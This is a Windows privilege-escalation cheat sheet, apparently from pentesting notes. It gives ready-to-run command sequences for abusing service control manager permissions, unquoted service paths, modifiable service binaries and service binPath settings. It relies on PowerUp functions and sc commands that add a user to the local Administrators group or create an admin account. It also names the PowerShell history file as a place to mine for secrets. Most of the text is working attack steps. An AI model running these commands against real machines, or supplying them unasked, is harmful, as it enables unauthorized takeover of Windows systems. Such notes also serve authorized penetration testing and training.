Windows Priv Esc

Tools

PowerUp: https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc

BeRoot: https://github.com/AlessandroZ/BeRoot

Privesc: https://github.com/enjoiz/Privesc

WinPEA: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite

SCManager Abuse

Not detected by most tools. Remember to check this one manually. Full writeup at https://recipeforroot.com/scmanger/

# show permissions for service creation
cmd /c sc sdshow scmanager

This will show SDDL for scmanager. Is possible for low priv user to be included.
https://itconnect.uw.edu/wares/msinf/other-help/understanding-sddl-syntax/

# Launch service as system from user
sc create MyService displayName= "MyService" binPath= "C:\Windows\System32\net.exe localgroup Administrators USER /add" start= auto

# Restart Computer and will be admin!

Unquoted Service Paths

Takes a pre-compiled C# service binary and patches in the appropriate commands needed for service abuse. If a -UserName/-Password or -Credential is specified, the command patched in creates a local user and adds them to the specified -LocalGroup, otherwise the specified -Command is patched in. The binary is then written out to the specified -ServicePath. Either -Name must be specified for the service, or a proper object from Get-Service must be passed on the pipeline in order to patch in the appropriate service name the binary will be running under.

# Enumeration
Invoke-AllChecks
Get-ServiceUnquoted

# Abuse
Write-ServiceBinary -Name 'service' -Path <HijackPatch> (will add john:Password123!)
Write-ServiceBinary -Name 'service' -Path C:\WebServer\Abyss.exe -Command "net localgroup Administrators user /add"

# Restart Service (cmd)
sc stop service
sc start service

Modify Service Executable

Replaces the service binary for the specified service with one that executes a specified command as SYSTEM.

Takes a service Name or a ServiceProcess.ServiceController on the pipeline where the current user can modify the associated service binary listed in the binPath. Backs up the original service binary to "OriginalService.exe.bak" in service binary location, and then uses Write-ServiceBinary to create a C# service binary that either adds a local administrator user or executes a custom command. The new service binary is replaced in the original service binary path, and a custom object is returned that captures the original and new service binary configuration.

# Enumeration
Invoke-AllChecks
Get-ModifiableServiceFile

# Abuse
Install-ServiceBinary -Name 'service' (will add john:password123!)
Install-ServiceBinary -Name 'service' -Command "net localgroup Administrators user /add"

# Manual
Write-ServiceBinary -Name 'service' -Command "command" -Path "C:\service\write.exe"

# Restart Service (cmd)
sc stop service
sc start service

# Cleanup
Restore-ServiceBinary -Name service -BackupPath 'C:\temp\backup.exe'

Modify Service BinPath

Takes a service Name or a ServiceProcess.ServiceController on the pipeline that the current user has configuration modification rights on and executes a series of automated actions to execute commands as SYSTEM. First, the service is enabled if it was set as disabled and the original service binary path and configuration state are preserved. Then the service is stopped and the Set-ServiceBinPath function is used to set the binary (binPath) for the service to a series of commands, the service is started, stopped, and the next command is configured. After completion, the original service configuration is restored and a custom object is returned that captures the service abused and commands run.

# Enumeration
Invoke-AllChecks
Get-ModifiableService

# Abuse
Invoke-ServiceAbuse -Name 'service' (will create a local admin john:Password123!)
Invoke-ServiceAbuse -Name 'service' -Command "net localgroup Administrators user /add"

# Manual

sc config "servicename" binPath= "cmd.exe /c net localgroup administrators user/add"
sc stop "servicename"
sc start "servicename"

Interesting Files

Command History in PowerShell 5.0

By default, the PowerShell in Windows 10 saves the last 4096 commands that are stored in a plain text file located in the profile of each user %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Last updated